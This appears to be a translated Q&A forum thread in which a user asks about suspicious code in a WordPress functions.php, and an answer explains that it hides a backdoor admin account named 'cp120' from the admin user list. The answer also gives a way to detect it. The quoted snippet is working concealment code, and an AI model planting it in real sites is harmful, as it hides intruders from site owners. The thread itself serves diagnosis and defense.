-1

サイトがハッキングされていると思うと言うクライアントがいます。いくつかのものを調べたところ、functions.php ファイルに疑わしいコードが見つかりました。誰かがこれを認識し、正しくないと感じていますか?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
4

1 に答える 1

1

このコードまたは同様のマークアップは、Wordpress ハッカーによって使用されることがあります。悪意のある方法で WordPress 管理者にアクセスすると、正規の管理者ユーザーを作成し、このコードを functions.php ファイルに挿入して、管理者ユーザー セクションに移動したときに 1 人のユーザーのみが表示されるようにします。長い functions.php ファイルを調べたくない場合に、php に慣れていない場合に備えて、これが発生したかどうかを確認するためのトリックを次に示します。管理者ユーザー エリアに移動すると、知っている管理者ユーザーのみが表示されますが、管理者ユーザーの横の数字は、表示されているユーザーの数と一致しません。(4) と表示されますが、3 つの名前しか表示されません。

注意として、このコードは正当な理由で使用される可能性があるため、これがサイトの管理者または開発者によって行われたものではないことを確認してください.

于 2013-08-26T16:33:50.657 に答える